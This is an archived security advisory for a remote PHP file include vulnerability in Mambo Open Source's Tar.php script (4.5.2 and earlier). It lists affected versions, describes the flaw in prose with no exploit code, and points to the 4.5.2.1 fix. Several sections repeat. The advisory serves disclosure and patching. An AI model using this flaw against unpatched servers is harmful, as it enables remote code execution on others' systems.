Mambo Open Source Tar.PHP Remote File Include Vulnerability
BID:12608
Info
Mambo Open Source Tar.PHP Remote File Include Vulnerability
| Bugtraq ID: | 12608 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 21 2005 12:00AM |
| Updated: | Feb 21 2005 12:00AM |
| Credit: | The discoverer of this vulnerability is not known. |
| Vulnerable: |
Mambo Mambo Open Source 4.5.2 Mambo Mambo Open Source 4.5.1 (1.0.9) Mambo Mambo Open Source 4.5.1 Mambo Mambo Open Source 4.5 (1.0.3beta) Mambo Mambo Open Source 4.5 (1.0.3) Mambo Mambo Open Source 4.5 (1.0.2) Mambo Mambo Open Source 4.5 (1.0.1) Mambo Mambo Open Source 4.5 (1.0.0) Mambo Mambo Open Source 4.0.14 |
| Not Vulnerable: |
Mambo Mambo Open Source 4.5.2 .1 |
Discussion
Mambo Open Source Tar.PHP Remote File Include Vulnerability
It is reported that Mambo Open Source is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'Tar.php' script.
Remote attackers could potentially exploit this issue to include a remote malicious PHP script, which will be executed in the context of the Web server hosting the vulnerable software.
This issue reportedly affects Mambo Open Source version 4.5.2 and earlier.
It is reported that Mambo Open Source is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'Tar.php' script.
Remote attackers could potentially exploit this issue to include a remote malicious PHP script, which will be executed in the context of the Web server hosting the vulnerable software.
This issue reportedly affects Mambo Open Source version 4.5.2 and earlier.
Exploit / POC
Mambo Open Source Tar.PHP Remote File Include Vulnerability
No exploit is required.
No exploit is required.
Solution / Fix
Mambo Open Source Tar.PHP Remote File Include Vulnerability
Solution:
The vendor has released version 4.5.2.1 to address this issue:
Mambo Mambo Open Source 4.0.14
Mambo Mambo Open Source 4.5 (1.0.2)
Mambo Mambo Open Source 4.5 (1.0.3beta)
Mambo Mambo Open Source 4.5 (1.0.1)
Mambo Mambo Open Source 4.5 (1.0.0)
Mambo Mambo Open Source 4.5 (1.0.3)
Mambo Mambo Open Source 4.5.1
Mambo Mambo Open Source 4.5.1 (1.0.9)
Mambo Mambo Open Source 4.5.2
Solution:
The vendor has released version 4.5.2.1 to address this issue:
Mambo Mambo Open Source 4.0.14
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5 (1.0.2)
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5 (1.0.3beta)
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5 (1.0.1)
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5 (1.0.0)
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5 (1.0.3)
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5.1
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5.1 (1.0.9)
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
Mambo Mambo Open Source 4.5.2
-
Mambo Mambo 4.5.2.1
http://mamboforge.net/frs/?group_id=5
References
Mambo Open Source Tar.PHP Remote File Include Vulnerability
References:
References:
- Mambo Open Source Homepage (Mambo)